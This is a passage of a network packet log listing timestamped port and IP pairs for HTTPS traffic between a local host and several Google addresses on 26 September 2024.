Sep 26, 2024 17:55:27.279865026 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.279975891 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.282200098 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.286421061 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.286484003 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.286504030 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.286510944 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.286564112 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.287604094 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.287939072 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.288036108 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.288094044 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.288110971 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.288873911 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.288919926 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.288938999 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.288990974 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.289928913 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.289937973 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.289959908 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.289974928 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.290061951 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.290173054 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.290220976 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.290235996 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.291176081 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.291378975 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.291438103 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.291451931 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.293025017 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.293111086 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.293118954 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.294751883 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.297471046 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.297548056 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.297560930 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.298413038 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.298470020 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.298485994 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.299724102 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.299781084 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.299793005 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.299889088 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.299943924 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.299951077 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.303812981 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.303881884 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.304265976 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.304476023 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.304526091 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.304536104 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.304563046 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.304572105 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.308985949 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.309305906 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.309367895 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.309377909 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.309401989 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.309412003 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.310590982 CEST	49729	443	192.168.2.16	142.250.184.206
Sep 26, 2024 17:55:27.310609102 CEST	443	49729	142.250.184.206	192.168.2.16
Sep 26, 2024 17:55:27.313623905 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.313705921 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.313718081 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.314884901 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.315022945 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.315035105 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.318296909 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.318383932 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.318396091 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.320353985 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.320416927 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.320436001 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.321482897 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.321561098 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.321753979 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.321960926 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.321997881 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.323165894 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.323235035 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.323246002 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.325858116 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.325917006 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.325927973 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.327614069 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.327670097 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.327681065 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.331398010 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.331547976 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.331557989 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.332292080 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.332381010 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.332391977 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.335686922 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.335812092 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.335819006 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.336978912 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.337255001 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.337268114 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.340313911 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.340368986 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.340387106 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.341721058 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.341768980 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.341784954 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.344629049 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.344676018 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.344688892 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.346374989 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.346568108 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.346581936 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.348975897 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.349030018 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.349037886 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.351448059 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.351583004 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.351687908 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.351705074 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.351896048 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.351985931 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.353066921 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.353132963 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.353141069 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.353542089 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.353554010 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.355494022 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.355591059 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.355616093 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.355654001 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.355674028 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.355684042 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.355700016 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.355722904 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.355865002 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.356359005 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.356369972 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.357285023 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.358834028 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.358849049 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.360054016 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.360111952 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.360127926 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.361201048 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.361428022 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.361442089 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.363815069 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.363858938 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.363864899 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.364391088 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.364463091 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.364475012 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.366208076 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.366260052 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.366267920 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.368478060 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.368555069 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.368570089 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.368720055 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.368777037 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.368783951 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.371608973 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.371681929 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.371687889 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.373198032 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.373383045 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.373397112 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.373527050 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.373544931 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.374442101 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.374516010 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.374603033 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.374608040 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.374686956 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.374696970 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.376354933 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.376527071 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.376578093 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.376586914 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.376612902 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.376621008 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.379097939 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.379193068 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.379209995 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.380301952 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.380353928 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.380362034 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.381473064 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.382870913 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.382899046 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.382908106 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.382935047 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.382941961 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.384036064 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.384083986 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.384121895 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.384129047 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.384174109 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.385598898 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.386569977 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.386596918 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.386604071 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.387645960 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.387693882 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.387701035 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.389077902 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.389117956 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.389143944 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.389154911 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.389781952 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.389909983 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.389950991 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.389972925 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.389996052 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.391098976 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.392178059 CEST	49731	443	192.168.2.16	142.250.186.174
Sep 26, 2024 17:55:27.392191887 CEST	443	49731	142.250.186.174	192.168.2.16
Sep 26, 2024 17:55:27.393429995 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.393474102 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.393513918 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.393522024 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.393699884 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.393743038 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.393753052 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.393790007 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.393815994 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.393826008 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.393836021 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.393867970 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.393873930 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.394654989 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.395879984 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.396807909 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.396953106 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.397001028 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.398224115 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.398251057 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.398271084 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.398283005 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.400466919 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.400530100 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.400547028 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.400770903 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.402590990 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.404819012 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.404860973 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.404922009 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.404936075 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.405806065 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.406980038 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.408713102 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.408726931 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.409285069 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.409326077 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.409369946 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.409377098 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.409405947 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.411428928 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.413532972 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.413603067 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.413667917 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.413675070 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.414599895 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.420321941 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.420403004 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.420460939 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.420465946 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.422235966 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.422280073 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.422379017 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.422394037 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.422521114 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.422615051 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.422622919 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.423732042 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.426769018 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.426872015 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.426908016 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.426949978 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.426964998 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.427166939 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.431246042 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.431355000 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.431404114 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.431430101 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.431437969 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.431489944 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.435554028 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.435622931 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.435667038 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.435703039 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.435709953 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.435748100 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.439738035 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.439888954 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.439924955 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.439961910 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.439969063 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.440006018 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.444004059 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.444226980 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.444264889 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.444303036 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.444319963 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.444777012 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.448057890 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.448153019 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.448251963 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.449491978 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.449507952 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.451961040 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.452270031 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.452395916 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.452450037 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.452461004 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.454977989 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.455029011 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.455121994 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.455136061 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.455190897 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.455696106 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.457874060 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.457921028 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.457995892 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.458009958 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.458069086 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.458884001 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.458906889 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.458971977 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.459156036 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.459238052 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.459312916 CEST	49747	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.459323883 CEST	443	49747	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.459333897 CEST	49727	443	192.168.2.16	142.250.186.132
